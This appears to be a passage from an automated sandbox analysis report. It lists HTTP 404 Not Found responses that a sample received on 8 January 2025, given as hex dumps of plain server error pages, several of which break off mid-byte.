30 12 81 18 d5 ff b9 37 e3 f8 3d 81 5f 3a 15 08 ea 00 dc 03 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Wed, 08 Jan 2025 15:13:27 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 38 34 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Wed, 08 Jan 2025 15:13:32 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Wed, 08 Jan 2025 15:13:37 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Wed, 08 Jan 2025 15:13:39 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Wed, 08 Jan 2025 15:13:42 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:14:02 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:14:05 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:14:07 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:14:10 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 